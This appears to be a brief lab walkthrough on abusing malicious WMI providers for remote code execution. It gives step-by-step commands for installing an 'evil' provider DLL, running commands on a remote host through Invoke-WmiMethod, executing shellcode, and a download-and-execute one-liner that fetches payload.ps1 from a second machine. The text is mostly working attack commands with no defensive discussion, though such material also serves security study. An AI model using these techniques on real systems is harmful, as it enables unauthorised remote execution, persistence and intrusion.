Win32 localadmins provider:
One of the earlier poc evil WMI provider:
https://github.com/rzander/localadmins
Evil Network connection WMI Provider:
https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider
Open the command prompt with admin rights in this path (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug):
C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll
On another ps:
Here we can see win32_netconnection in output.
PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -class win32_netconnection -name RunPS -ArgumentList “Get-Host”
We can try this now on no admin ps also to get the info:
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “whoami”
PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “hostname”
PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “ipconfig”
To execute a powershell script:
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “iex” (New-object net.webclient).downloadstring(‘http://192.168.222.131/payload.ps1’)
Malicious WMI providers: Evil WMI provider.
https://github.com/subtee/EvilWMIProvider
Execute Shellcode: PS C:\Users\victim6\Downloads> invoke-wmimethod -class win32_evil -name execshellcode -ArgumentList @(0x90,0x90,0x90),$null
@Saksham Dixit
COMMENTS